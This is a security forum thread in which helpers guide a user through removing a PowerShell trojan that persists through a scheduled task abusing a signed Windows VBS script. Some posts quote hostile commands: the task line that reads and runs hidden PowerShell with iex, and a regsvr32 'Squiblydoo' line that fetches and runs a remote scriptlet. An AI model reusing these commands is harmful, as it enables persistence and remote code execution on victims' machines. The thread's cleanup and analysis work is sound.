PowerShell/Agent.AEW trojan keeps coming back after cleaning and reboot

Marcos · May 4, 2022

5 minutes ago, Shogun1 said:

I have the folder C:\Windows\System32\Tasks in my windows 11 and tried to erase.

I guess, you were saying but couldn't erase it...! My question is; did you mean that folder all of it or I misread that??

Please run scheduler and delete the task Microsoft\Windows\NetService\Network\NetServices

itman · May 4, 2022

@Marcos, I found an earlier variant of this attack tracking to 10/2021. This one wouldn't require admin privileges. Details posted below. Let's analyze:

1. Attacker created a Logs folder in %LocalAppData% directory. Then he dropped system-logs.txt file there.

2. He then leveraged legit Win system SyncAppvPublishingServer.vbs script to run PowerShell script at task startup time.

Quote

Task: {258116A2-BD82-4698-9403-CE25E42EAEF1} - System32\Tasks\Microsoft\Windows\NetService\Network\NetServices => C:\Windows\System32\SyncAppvPublishingServer.vbs [1720 2019-12-07] (Microsoft Windows -> ) -> "n; $a = Get-Content "C:\Users\User\AppData\Local\logs\system-logs.txt" | Select -Index 17033;iex $a;hackbacktrack XoBJLWeei4NqeQuFneR9fArkoDLpp4Tj+YZu2tRZg3I=

-Log Details-
Protection Event Date: 10/6/21
Protection Event Time: 1:11 PM
Log File: 2b7dad48-26d9-11ec-87a2-bc5ff42b1b34.json

-System Information-
OS: Windows 10 (Build 19042.985)
CPU: x64
File System: NTFS
User: System

-Blocked Website Details-
Malicious Website: 1
, C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Blocked, -1, -1, 0.0.0, ,

-Website Data-
Category: RiskWare
Domain: ai.backend-chat.com
IP Address: 172.67.170.251
Port: 443
Type: Outbound
File: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

https://forums.malwarebytes.com/topic/279614-riskware-block-aibackend-chat/

EDIT - Per OP's posted Autoruns text:

Quote

+ "\Microsoft\Windows\NetService\Network\NetServices" "" "(Verified) " "c:\windows\system32\syncappvpublishingserver.vbs" "12/7/2019 5:10 AM" "0/73"

Appears this bugger has "been flying under the Eset radar" for sometime.

Oh, my. There it is:

https://lolbas-project.github.io/lolbas/Scripts/Syncappvpublishingserver/

https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/md/Syncappvpublishingserver.exe.md

Edited May 4, 2022 by itman

itman · May 4, 2022

Also came across a Meterpreter remote attack using "Squiblydoo" technique via SyncAppvPublishingServer.vbs.

Quote
SyncAppvPublishingServer.vbs "Break; regsvr32 /s /n /u /i:http://192.168.254.158:8080/jnQl1FJ.sct scrobj.dll"
SyncAppvPublishingServer – Regsvr32

SyncAppvPublishingServer – Meterpreter via Regsvr32

https://pentestlab.blog/tag/syncappvpublishingserver/

Edited May 4, 2022 by itman

Shogun1 · May 5, 2022

11 hours ago, Marcos said:

Please run scheduler and delete the task Microsoft\Windows\NetService\Network\NetServices

Hey there Marcos,

I found C:\Windows\System32\Tasks\Microsoft\Windows\NetService\Network

but there is no file or a folder called \NetServices after \Network

it is empty or hidden ..! What should I do in this case??

Regards,

Shogun1 · May 5, 2022

I wanted to add this popup showing every time I have my 3 Laptops turned on:

itman · May 5, 2022

12 hours ago, Shogun1 said:

I found C:\Windows\System32\Tasks\Microsoft\Windows\NetService\Network

but there is no file or a folder called \NetServices after \Network

it is empty or hidden ..! What should I do in this case??

Open Windows Task Scheduler. Then open Task Scheduler Library folder.

Perform the following:

1. Open Microsoft folder.

2. Open Windows folder.

Navigate downward until NetService folder is found. Open NetService folder. Take a screen shot of what is displayed and attach it to your next reply.

Shogun1 · May 5, 2022

Hey itman,

Here is the screenshot of what you asked,

Hopefully it's helpful,

itman · May 5, 2022

14 minutes ago, Shogun1 said:

Here is the screenshot of what you asked,

Repeat the same procedure. Right mouse click on NetServices and then select delete. At this point, this scheduled task should no longer run at system startup time.

Shogun1 · May 5, 2022

3 minutes ago, itman said:

Repeat the same procedure. Right mouse click on NetServices and then select delete. At this point, this scheduled task should no longer run at system startup time.

Done and deleted it from 1 laptop and will perform the same thing on my other 2 laptops as well to see what's new!

Please standby for my future replies next move

Shogun1 · May 5, 2022

@itman,

Your trick worked and notification has gone completely but I have ESET Staff asking me for more info and further investigation to determine whether I have malware infection or not..!

Thanks for your time and help dude,

JamesR · May 6, 2022

I assisted Shogun1 with some more cleanup. There were 2 other scheduled tasks which used the same lolbin trick. Not uncommon for these powershell scheduled tasks to leverage multiple scheduled tasks to increase their persistence. Samples of everything have been gathered and submitted.

formingus · June 10, 2022

On 5/6/2022 at 2:42 AM, JamesR said:

I assisted Shogun1 with some more cleanup. There were 2 other scheduled tasks which used the same lolbin trick. Not uncommon for these powershell scheduled tasks to leverage multiple scheduled tasks to increase their persistence. Samples of everything have been gathered and submitted.

Hi, can you be kind and look at this thread https://forum.eset.com/topic/32653-annoying-powershellagentaew-on-each-start-need-assitence/#comment-152054

Kevin999 · August 10, 2022

On 5/4/2022 at 8:39 PM, Shogun1 said:

Hey Ted,

I have the folder C:\Windows\System32\Tasks in my windows 11 and tried to erase.

I guess, you were saying but couldn't erase it...! My question is; did you mean that folder all of it or I misread that??

The same virus. It seems caused by a UltraEdit cracker.

itman · August 10, 2022

11 hours ago, Kevin999 said:

The same virus. It seems caused by a UltraEdit cracker.

In regards to this, a reference article: https://www.ultraedit.com/ultraedit-crack-code.html

Kevin999 · August 12, 2022

I try to recovery the SyncAppvPublishingServer.vbs from EIS' quarantine, and I will sent it to you later. @Marcos

Marcos · August 12, 2022

2 hours ago, Kevin999 said:

I try to recovery the SyncAppvPublishingServer.vbs from EIS' quarantine, and I will sent it to you later. @Marcos

The detection is correct. The other script was a standard vbs file which is part of Windows installations.

Sign In

PowerShell/Agent.AEW trojan keeps coming back after cleaning and reboot

Recommended Posts

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Recently Browsing 0 members

Quick search

FAQ

Topics